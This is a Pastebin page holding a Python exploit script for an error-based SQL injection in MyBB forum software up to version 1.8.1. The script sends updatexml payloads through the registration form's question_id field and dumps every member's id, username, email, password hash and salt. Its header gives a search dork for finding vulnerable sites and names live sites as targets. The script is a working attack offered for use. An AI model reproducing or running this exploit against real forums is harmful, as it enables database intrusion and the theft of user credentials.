SHARE
TWEET

MyBB 1.8.X <= 1.8.1 Error based SQL Injection

a guest Nov 16th, 2014 655 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. # Exploit Title: MyBB 1.8.X <= 1.8.1 Error based SQL Injection
  3. # Date : 2014-11-15
  4. # Google Dork : intext:Powered By MyBB
  5. # Vendor Homepage: http://www.mybb.com/
  6. # Software Link: http://resources.mybb.com/downloads/mybb_1801.zip
  7. # Version: 1.8.X
  8. # Tested on: Linux / Python 2.7
  9. # Status : Patched in MyBB 1.8.2
  10. # Author : MakMan -- mak.man@live.com -- https://www.facebook.com/hackticlabs
  11. # Live Vulnerable Targets : http://livedemo.installatron.com/1416038193mybb/ : http://gamergate.community/
  12.  
  13. print '\n\n---------------------------------------------------------------------------------'
  14. print 'Script Coded by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
  15. print '-----------------------MyBB 1.8.X Error based SQL Injection---------------------'
  16. print '---------------------------------------------------------------------------------\n\n\n'
  17. url = raw_input('Enter URL http://www.exmaple.com/path_to_mybb :: ')
  18. url = url.rstrip('/')
  19. ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
  20.  
  21. import sys, re
  22. import urllib2, urllib
  23.  
  24. def inject(sql):
  25.     try:
  26.         urllib2.urlopen(urllib2.Request('%s/member.php' % url, data="regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=makman%s" % urllib.quote("\' and updatexml(NULL,concat (0x3a,(%s)),NULL) and \'1" % sql), headers={"User-agent": ua}))
  27.     except urllib2.HTTPError, e:
  28.             data = e.read()
  29.             if e.code == 503:
  30.                     txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
  31.                     if txt is not None:
  32.                         return txt.group(1)
  33.                     sys.exit('Error [3], received unexpected data:\n%s' % data)
  34.             sys.exit('Not Vulnerable i guess !!!')
  35.     sys.exit('Not Vulnerable or check your inernet connection !!')
  36.  
  37. def get(name, table, num):
  38.     sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
  39.     s = int(inject('LENGTH((%s))' % sqli))
  40.     if s < 31:
  41.         return inject(sqli)
  42.     else:
  43.         r = ''
  44.         for i in range(1, s+1, 31):
  45.             r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
  46.         return r
  47.  
  48.  
  49. members_table= inject('select table_name from information_schema.tables where table_schema=database() and table_name regexp 0x757365727324 limit 0,1')
  50. n = inject('SELECT COUNT(*) FROM %s' % members_table)
  51. print '----------------------------------------------------------------------------'
  52. print '* Found %s users' % n
  53. print '----------------------------------------------------------------------------'
  54. for j in range(int(n)):
  55.         print '{:20s} {:20s}'.format('Id',get('uid', members_table, j))
  56.         print '{:20s} {:20s}'.format('Name',get('username', members_table, j))
  57.         print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
  58.         print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(password,0x3a,salt)', members_table, j))
  59.         print '----------------------------------------------------------------------------'
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top